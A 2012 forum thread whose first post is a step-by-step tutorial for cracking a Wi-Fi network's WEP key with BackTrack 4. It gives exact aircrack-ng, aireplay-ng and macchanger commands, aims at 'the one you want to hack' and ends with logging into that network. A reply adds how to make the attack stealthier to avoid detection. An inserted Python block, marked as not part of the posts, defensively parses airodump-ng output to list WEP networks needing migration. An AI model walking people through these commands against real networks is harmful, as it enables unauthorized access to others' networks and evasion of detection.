Cracking WEP

Mr-GrayHat
n00b
Posts: 4
Joined: Thu Jul 26, 2012 6:50 am

Cracking WEP

Post by Mr-GrayHat » Thu Jul 26, 2012 7:38 am

This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similarly in newer versions. BackTrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

Guide link will go here after being accepted [ here ]

What you will need:

Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do; if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id= ... ard_to_buy)
Optional: Flash drive or blank DVD

1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within Windows, or you can boot BackTrack straight off of a DVD or flash drive. Instructions for each of these methods are on the BackTrack website.

2. Once you have booted up BackTrack, it will ask you for a username and password.
username: root
password: toor

3. Now type startx and press enter. This will log you into BackTrack and you should now see the desktop.

4. Open a command terminal. You can do this by clicking the black box icon in the bottom left corner of the screen.

5. type in: airmon-ng

6. Look for the name of your wireless card; it's different for a lot of computers. Mine is wlan0, so for the rest of this guide that's what I'm going to use. Replace wlan0 in all the following steps with whatever your device name is.

7. type: airmon-ng stop wlan0

8. type: macchanger --mac 00:11:22:33:44:55 wlan0

9. type: airmon-ng start wlan0

10. type: airodump-ng wlan0

11. You will now see all of the wifi networks in range. Once you've found the one you want to hack, press Ctrl + C to stop scanning. Take note of the BSSID and channel of the network you want to hack.

12. type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0

13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

14. type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0

15. type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0

16. Now go back to the 1st window; you'll notice a number steadily increasing. Once it's over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the number is even higher, try again at 15,000, and so on.

17. Open a new command window and type: aircrack-ng -b (enter bssid) wephack-01.cap

18. You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When it's found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)

NOTES:

Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take a while for you to get enough packets to crack the WEP.
Last edited by Cool_Fire on Thu Jul 26, 2012 9:45 pm, edited 3 times in total.
Reason: Fixing formatting
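Added example (not part of either post, and not aircrack-ng's own code): the "-w wephack" run in step 12 also writes a wephack-01.csv beside the .cap. This Python script parses that CSV on a constructed sample, using the column headers airodump-ng is assumed to write, and lists every access point still advertising WEP with its captured IV count and the clients seen attached to it, which is the inventory a network owner needs to find WEP networks to migrate.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout (the "-w wephack" run on the page
# also writes wephack-01.csv beside the .cap). Every value below is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:AA:BB:CC:DD:01, 2012-07-26 07:38:00, 2012-07-26 07:45:00,  6,  54, WEP , WEP, OPN, -40,      120,    14233,   0.  0.  0.  0,   6, labnet,
00:AA:BB:CC:DD:02, 2012-07-26 07:38:01, 2012-07-26 07:45:00, 11,  54, WPA2, CCMP, PSK, -55,       98,        0,   0.  0.  0.  0,   5, guest,
00:AA:BB:CC:DD:03, 2012-07-26 07:38:02, 2012-07-26 07:44:50,  1,  54, WEP , WEP, OPN, -70,       30,      312,   0.  0.  0.  0,   7, oldshop,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2012-07-26 07:40:00, 2012-07-26 07:45:00, -30,     9000, 00:AA:BB:CC:DD:01,
AA:BB:CC:00:00:02, 2012-07-26 07:39:00, 2012-07-26 07:45:00, -60,       40, 00:AA:BB:CC:DD:01, labnet
"""

# The guide's rule of thumb: about 10,000 captured IVs is enough to attempt a crack.
IV_EXPOSURE_THRESHOLD = 10000

def _rows(block):
    """Parse one CSV section into dicts, stripping airodump-ng's padding spaces."""
    reader = csv.reader(io.StringIO(block))
    header = [h.strip() for h in next(reader)]
    return [{k: v.strip() for k, v in zip(header, row)}
            for row in reader if row and row[0].strip()]

def parse_airodump_csv(text):
    """Return (access_points, stations); the two sections are separated by a blank line."""
    ap_block, station_block = [s for s in text.strip().split("\n\n") if s.strip()][:2]
    return _rows(ap_block), _rows(station_block)

def wep_audit(text):
    """List every AP still on WEP with its IV count and the clients seen attached to it."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for st in stations:
        clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    findings = []
    for ap in aps:
        if ap["Privacy"].upper() != "WEP":
            continue
        ivs = int(ap["# IV"])
        findings.append({
            "bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
            "ivs": ivs, "clients": clients.get(ap["BSSID"], []),
            # WEP keys fall to IV reuse: a high count means the key is exposed in this capture.
            "high_iv_exposure": ivs >= IV_EXPOSURE_THRESHOLD,
        })
    return findings
```

Run wep_audit on a real wephack-01.csv to get the same list for networks you operate; any entry it returns should be moved off WEP rather than tuned.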

Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d

Re: Cracking WEP

Post by Cool_Fire » Thu Jul 26, 2012 9:48 pm

It's worth noting that ideally someone should be on the network (as stated).
The more people are actively using the network, the faster you'll be able to capture enough IVs to crack the WEP key.
Additionally, if you want to do a more stealthy attack, you can skip the aireplay steps. These are done to drive up the number of packets sent over the network, but can be detected.
